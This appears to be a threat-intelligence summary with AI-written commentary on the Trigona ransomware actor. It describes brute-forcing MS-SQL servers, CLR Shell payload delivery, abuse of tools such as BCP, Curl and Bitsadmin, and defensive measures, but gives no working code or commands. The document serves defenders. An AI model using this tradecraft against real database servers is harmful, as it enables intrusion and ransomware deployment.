Analysis of Trigona Threat Actor's Latest Attack Cases

SUMMARY :

The Trigona threat actor continues to target MS-SQL servers through brute-force and dictionary attacks, exploiting weak credentials. They use CLR Shell for additional payloads and employ various tools like BCP, Curl, Bitsadmin, and PowerShell to install malware. The attackers utilize remote control tools such as AnyDesk, RDP, and possibly Teramind. New scanner malware written in Rust targets RDP and MS-SQL services. The threat actor also uses tools like SpeedTest and a custom StressTester. Various privilege escalation and file manipulation tools are employed. To protect against these attacks, administrators should use complex passwords, regularly update security software, and implement firewalls to control access to database servers.

OPENCTI LABELS :

remote-control,ransomware,trigona


AI COMMENTARY :

1. Analysis of Trigona Threat Actor’s Latest Attack Cases The Trigona threat actor, known for its relentless targeting of enterprise environments, has once again made headlines by focusing on MS-SQL servers. In their latest series of attacks, they exploit weak or default credentials using brute-force and dictionary methods to gain initial access. By zeroing in on misconfigured login policies, Trigona continues to reveal the importance of strong authentication and careful credential management when it comes to database security.

2. Attack Methods and Credential Exploitation After achieving entry through compromised or weak credentials, Trigona operators deploy a CLR Shell to deliver additional payloads directly into the target environment. This method enables them to sidestep traditional antivirus detections and execute code within the context of the database process. Their choice of MS-SQL servers highlights a wider trend in threat intelligence where attackers pursue high-value data sources that often lack rigorous patching and monitoring.

3. Payload Deployment Tools Trigona’s toolbox includes a variety of legitimate administrative utilities repurposed for malicious intent. BCP is abused for data exfiltration, Curl and Bitsadmin for downloading and uploading files, and PowerShell scripts for orchestrating complex payload chains. By leveraging trusted system tools, the threat actor minimizes the chance of triggering security alerts. The seamless integration of these utilities underscores a critical need for defenders to monitor command-line usage and unusual process invocations on database hosts.

4. Remote-Control and Scanner Malware Beyond initial compromise, Trigona frequently resorts to remote-control platforms such as AnyDesk and RDP, and in some instances appears to deploy Teramind for covert monitoring. Recently discovered scanner malware, written in Rust, extends their reach by probing RDP and MS-SQL services across networks. This new tool automates vulnerability discovery and credential testing at scale, accelerating lateral movement and reducing the time to full network compromise.

5. Stress Testing and Privilege Escalation Utilities In addition to reconnaissance and remote control, Trigona employs performance measurement tools like SpeedTest and a bespoke StressTester to assess network bandwidth and system resilience. Meanwhile, custom privilege escalation and file manipulation utilities enable them to elevate access and modify or delete critical files. This multi-tool approach allows the threat actor to strengthen persistence and inflict maximum disruption once inside the environment.

6. Defense Strategies and Best Practices To defend against the evolving Trigona threat, administrators must enforce complex, unique passwords for all database accounts and implement account lockout policies to thwart brute-force and dictionary attacks. Regularly updating security software and applying patches can neutralize known vulnerabilities exploited during CLR Shell deployment. Network segmentation and firewalls should be configured to restrict direct access to MS-SQL and RDP services from untrusted networks. Finally, continuous monitoring of administrative tools, command-line parameters, and remote-control sessions is essential for rapid detection and response to these sophisticated intrusion attempts.


OPEN NETMANAGEIT OPENCTI REPORT LINK!


Use public read only username and password on login page.

NOTE : Use Public READ only user credentials on login page banner.


Analysis of Trigona Threat Actor's Latest Attack Cases